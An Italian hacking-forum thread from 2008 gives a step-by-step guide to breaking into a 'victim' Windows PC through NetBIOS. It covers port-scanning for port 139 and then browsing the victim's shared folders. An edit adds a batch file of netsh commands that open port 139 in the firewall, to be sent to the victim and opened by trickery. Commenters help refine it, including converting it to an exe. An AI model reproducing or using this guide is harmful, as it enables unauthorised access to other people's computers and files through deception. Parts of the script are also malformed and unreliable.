Attaccare un PC - Parte 2: Accedere al PC tramite netbios

« Older   Newer »
  Share  
Suxsem
view post Posted on 8/10/2008, 14:17





Dopo avere trovato l'IP della nostra vittima (per esempio seguendo questa guida: http://hackeco.forumfree.net/?t=32906248) è arrivato il momento di sferrare l'attacco vero e proprio.
Uno dei metodi + efficaci è quello di utilizzare il netbios, di default abilitato su tutti gli o.s. Windows
Vediamo un po' come sfruttarlo

Come sempre sottolineo di provare tutto su vostri PC
1)Scarikiamo innanzitutto un utilissimo programma x tutti gli hacker, un port scanner (un programma ke ci permette di saxe le porte aperte in un determinato IP), in questo caso la scelta cade su advanced port scanner: http://www.gold-software.com/download6744.html
2)Installiamo il programma e avviamolo
3)Inseriamo l'IP della vittima precedentemente trovato e premiamo scan
4)Aspettiamo il responso...
5)Se nell'elenco delle porte aperte è presente la 139 (o comunque una porta che riporta la dicitura "netbios") siamo a cavallo...la vittima non l'ha chiusa e il suo PC è molto vulnerabile
edit: grazie francesco per la segnalazione:
se la porta 139 non è aperta...
CITAZIONE
1)Aprire blocco note;
2)Scrivere:
CODICE
@echo off
netsh firewall add portopening tcp 139
netsh firewall add portopening udp 139
netsh %­SYSTEMDRIVE%

3)Salvare come "nomekevolete.bat" (virgolette incluse)
4)Inviare il file alla vittima e trovare il modo di farglielo aprire

6)Non ci rimane che aprire explorer e inserire nella barra degli indirizzi "\\IP_DELLA_VITTIMA" (senza virgolette) e dare INVIO. (es. "\\88.168.25.2")
7)Tutte le cartelle condivise dal PC saranno totalmente accessibili da voi

Nella prossima parte vedremo addirittura come sfruttare questa vulnerabilità per attacchi ancora più efficaci...
Stay tuned!

Edited by Suxsem - 8/10/2008, 21:11
 
Top
30 replies since 8/10/2008, 14:17
  Share  
 

Comments

« Older   Newer »
  Share  
francesco1095
view post Posted on 8/10/2008, 18:38




bene :)
inserisci pure il bat che apre la 139 in caso é chiusa ;)
 
Top
Suxsem
view post Posted on 8/10/2008, 19:35




ah giusto! Me lo posti qui ke lo inserisco su? ^^
 
Top
francesco1095
view post Posted on 8/10/2008, 19:52




me lo ricordo,
mi pare che fosse
CODICE
netsh firewall add portopening tcp 139
netsh firewall add portopening udp 139
netsh C:\

naturalmente con echo off e con le chiocciole che non mi andava di scriverle :P
 
Top
Suxsem
view post Posted on 8/10/2008, 20:12




ke fatica... XD ok grz..aggiungo subito


post aggiornato ;)
 
Top
francesco1095
view post Posted on 8/10/2008, 20:16




ma scs é la seconda volta che scrivi virgolette incluse ma non si possono inserire nei nomi dei file XDXDXD
 
Top
Suxsem
view post Posted on 8/10/2008, 20:22




si ke si può! leggi qui:
#entry274036539
 
Top
Frenk_74
view post Posted on 19/11/2008, 14:40




ma se lo converto in exe funziona????
 
Top
Frenk_74
view post Posted on 19/11/2008, 14:58




ho provato sul mio pc e quando faccio la scansione nn ce la 139 aperta
 
Top
Suxsem
view post Posted on 20/11/2008, 15:11




hai un router?
 
Top
Soul McEvil
view post Posted on 20/11/2008, 15:37




il router cambia qualcosa ?
 
Top
Suxsem
view post Posted on 20/11/2008, 16:03




certo...devi fare il port forwaring...
 
Top
30 replies since 8/10/2008, 14:17   2,970 views
  Share